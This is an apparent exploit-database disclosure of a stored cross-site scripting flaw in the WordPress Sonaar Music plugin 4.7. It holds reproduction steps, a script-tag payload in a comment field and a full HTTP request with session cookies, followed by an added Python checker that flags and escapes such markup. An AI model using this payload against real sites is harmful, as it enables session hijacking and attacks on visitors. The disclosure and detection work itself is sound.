# Exploit Title: WordPress Sonaar Music Plugin 4.7 - Stored XSS
# Date: 2023-09-05
# Exploit Author: Furkan Karaarslan
# Category: WebApps
# Vendor Homepage: http://127.0.0.1/wp/wordpress/wp-comments-post.php
# Version: 4.7 (REQUIRED)
# Tested on: Windows/Linux
--------------------------------------------------------------------------------------------------------------------------------------------------------
1- First, install the Sonaar Music plugin.
2- Then go to the playlist add page: http://127.0.0.1/wp/wordpress/wp-admin/edit.php?post_type=sr_playlist
3- Click the "Add New Playlist" button.
4- Open the page and publish it with a random title: http://127.0.0.1/wp/wordpress/wp-admin/post-new.php?post_type=sr_playlist
5- This is the published page: http://127.0.0.1/wp/wordpress/album_slug/test/
6- Paste our XSS payload into the comment section. PAYLOAD: <script>alert('XSS')</script>
Bingo.

Request:
POST /wp/wordpress/wp-comments-post.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 155
Cache-Control: max-age=0
sec-ch-ua:
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: ""
Upgrade-Insecure-Requests: 1
Origin: http://127.0.0.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/wp/wordpress/album_slug/test/
Accept-Encoding: gzip, deflate
Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: comment_author_email_52c14530c1f3bbfa6d982f30480224a=a%40gmail.com; comment_author_52c14530c1f3bbfa6d982f304802224a=a%22%26GT%3balert%28%29; wordpress_test_cookie=wp%20cookie%20check; wordpress_logged_in_52c14530c1f3bbfa6d982f30480224a=hunter%7C1694109284%7cxxgnjfgcc7fpgqkkjraw uv1kg8xaqu3rixudyzjorsb1w%7C16E2E3964E42D9E56EDD7EB7E45B67676094D0B9E0B9E0AB7FCEC2E844549772E438BA9; wp-settings-time-1=1693936486
Connection: close

comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+G%C3%B6nder&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5
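The request above carries the payload in the `comment` field of a wp-comments-post.php form post, together with a `_wp_unfiltered_html_comment` nonce. The following added example (not part of the original write-up or of the plugin) parses such a body, reports script-capable markup in the comment, and shows the output escaping the rendering template should apply; the sample body is constructed from the request above and the helper names are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qs

# Constructed sample: the form body from the request above (nonce value as shown on the page)
SAMPLE_BODY = (
    "comment=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&submit=Yorum+G%C3%B6nder"
    "&comment_post_ID=13&comment_parent=0&_wp_unfiltered_html_comment=95f4bd9cf5"
)

# Tags that execute or load active content when rendered unescaped
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg"}


class _TagCollector(HTMLParser):
    """Collects tag names and on*-event attributes found in an HTML fragment."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.event_attrs = []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag.lower())
        self.event_attrs += [name for name, _ in attrs if name.lower().startswith("on")]


def inspect_comment_post(body: str) -> dict:
    """Parse a wp-comments-post.php form body and flag markup that would run if stored unescaped."""
    fields = parse_qs(body, keep_blank_values=True)
    comment = fields.get("comment", [""])[0]
    collector = _TagCollector()
    collector.feed(comment)
    active = sorted(set(collector.tags) & ACTIVE_TAGS)
    return {
        "post_id": fields.get("comment_post_ID", [""])[0],
        "active_tags": active,
        "event_handlers": sorted(set(collector.event_attrs)),
        # Present when the commenter's session holds unfiltered_html; worth logging on review
        "unfiltered_html_nonce": "_wp_unfiltered_html_comment" in fields,
        "suspicious": bool(active or collector.event_attrs),
    }


def render_comment_safely(comment: str) -> str:
    """Escape the stored comment for HTML output (the esc_html-style step the template must perform)."""
    return html.escape(comment, quote=True)
```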